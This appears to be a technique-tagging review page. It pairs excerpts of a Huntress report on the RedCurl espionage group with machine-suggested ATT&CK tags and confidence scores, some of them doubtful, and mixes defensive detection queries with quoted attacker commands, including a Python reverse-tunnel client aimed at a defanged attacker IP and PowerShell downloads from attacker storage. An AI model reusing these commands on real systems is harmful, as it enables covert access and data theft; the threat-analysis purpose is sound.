“exe to launch the malware via scheduled tasks. This binary executed a batch script, which then launched PowerShell to unarchive files with 7zip and add them to the system. "c:\programdata\7za.exe" x -aoa -p <redacted> revtun3ag.tmp -oc:\programdata\controlsup a…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
T1053.005 Scheduled Task (99%)
“controlsup\cl\cl.py --s 188.130.207[.]253 --p 10310 Additional tasks: Scheduled task 2 wifitask da76918700ee0725 executable: pcalua.exe arguments: -a c:\windows\system32\config\systemprofile\appdata\local\wcm\mbda76918700ee0725.exe scheduled tas…”
T1053.005 Scheduled Task (99%)
“) by running the command: get-scheduledtask -taskname "[task name]" -verbose | select -expandproperty actions The Sigma rule "scheduled task executed uncommon lolbin" contains the right logic for this, but would just need the addition of \pcalua.exe to the list of paths…”
T1053.005 Scheduled Task (99%)
“-a”) Then, you can utilize a Sigma rule for basic pcalua.exe execution and add any filters for normal activity you observe. If you have the Microsoft-Windows-TaskScheduler/Operational event log enabled, you can search for tasks that are created that execute pcalua.exe,…”
T1053.005 Scheduled Task (99%)
“practices for event logging and threat detection" was published, which again highlighted the heavy use of LOTL techniques and gave guidance on setting up proper logging to detect these attacks. The most common technique we saw used in these incidents was the use of pcalua.exe i…”
T1059.001 PowerShell (97%)
“za.exe")) and process.parent.name == "powershell.exe" Note: the queries above should be made case insensitive, if possible in your environment, for the best results. Conclusion The activity observed in this attack highlights the importance of constantly monitoring yo…”
T1059.006 Python (96%)
“looking for Python executables in those events while filtering out some normal activity. Alternatively, you can hunt for the same activity by running queries through process data looking for python.exe or pythonw.exe with commands that include an IP address, perhaps using a sim…”
T1053.005 Scheduled Task (93%)
“869b4c executable: pcalua.exe arguments: -a c:\users\<redacted>\appdata\local\subscriptionmonitor\uo94e668b9cf869b4c.exe Scheduled task 5 silentcleanup 6db9110b3989a881 executable: pcalua.exe arguments: -a c:\programdata\diskcleanup\om6db9110b3989…”
T1486 Data Encrypted for Impact (93%)
“and guidance for detecting and mitigating these attacks. This was followed up with the creation and release of another joint effort document called "Identifying and Mitigating Living Off the Land Techniques" which can be found on the Australian Signals Directorate website, whic…”
T1560.001 Archive via Utility (92%)
“in process data) from these incidents: start "" "%pdir%\pythonw.exe" %pdir%\rpv\client.py --server-ip %srv% --server-port %port% This query would likely have a number of legitimate matches in many development environments where Python is used frequent…”
T1105 Ingress Tool Transfer (91%)
“download files called revtun1.tmp and revtun2.tmp from bora.teracloud[.]jp/dav using HTTP GET requests crafted within the PowerShell commands. The files downloaded are then extracted with 7zip, using a password stored in the batch file. This specific behavior was used by …”
T1053.005 Scheduled Task (86%)
“.exe arguments: -a c:\programdata\diskcleanup\om6db9110b3989a881.exe We also saw additional scheduled tasks, which are likely related activity that used pcalua.exe to call pythonw.exe and execute a script to start reverse proxy tunnels. This seems to have been on som…”
T1560.001 Archive via Utility (84%)
“to start looking for more specific behavior of query for creating password-protected archive files with 7zip and deleting the original files with the -sdel flag: where ((winlog.event_data.description like "*7-zip*" or (process.name == "7z.exe" or process.na…”
T1486 Data Encrypted for Impact (73%)
“motivated threat actor who may be interested in the data that can be found in your network. IOCs Files Network indicators MITRE ATT&CK mapping References - Trend Micro report: "Unveiling Earth Kapre (aka RedCurl's Cyberespionage Tactics)" - Group-IB RedCurl reports: 2…”
T1059.001 PowerShell (69%)
“download files called revtun1.tmp and revtun2.tmp from bora.teracloud[.]jp/dav using HTTP GET requests crafted within the PowerShell commands. The files downloaded are then extracted with 7zip, using a password stored in the batch file. This specific behavior was used by …”
T1053.005 Scheduled Task (56%)
“learned from these incidents and how to detect similar techniques that RedCurl or any other malware or adversaries could use in the future. What did we find? The Huntress Security Operations Center (SOC) received an alert on a host that had recently installed the Huntress agent…”
T1059.001 PowerShell (56%)
“we identified the same tradecraft used on additional hosts and at various other organizations. We uncovered three intrusions across three different organizations that were all fully or partially located in Canada. The activity observed in these attacks all match very closely with…”
T1053 Scheduled Task/Job (42%)
“practices for event logging and threat detection" was published, which again highlighted the heavy use of LOTL techniques and gave guidance on setting up proper logging to detect these attacks. The most common technique we saw used in these incidents was the use of pcalua.exe i…”
T1005 Data from Local System (38%)
“Hunt for RedCurl | Huntress In mid to late 2024, Huntress uncovered activity across several organizations in Canada, with similar infrastructure and TTPs used that can be associated with the APT group known as RedCurl (aka Earth Kapre and Red Wolf). This activity goes back as f…”
T1560.001 Archive via Utility (30%)
“from a particular software or process, and would be easy to filter out this known activity. Hunting for this particular process chain would catch a good amount of the observed RedCurl activity and some other possibly interesting events. The DFIR Report noted in their report from a…”
Summary
Huntress discovered RedCurl activity across several organizations in Canada going back to 2023. Learn more about how this APT operates and how they aim to remain undetected while exfiltrating sensitive data.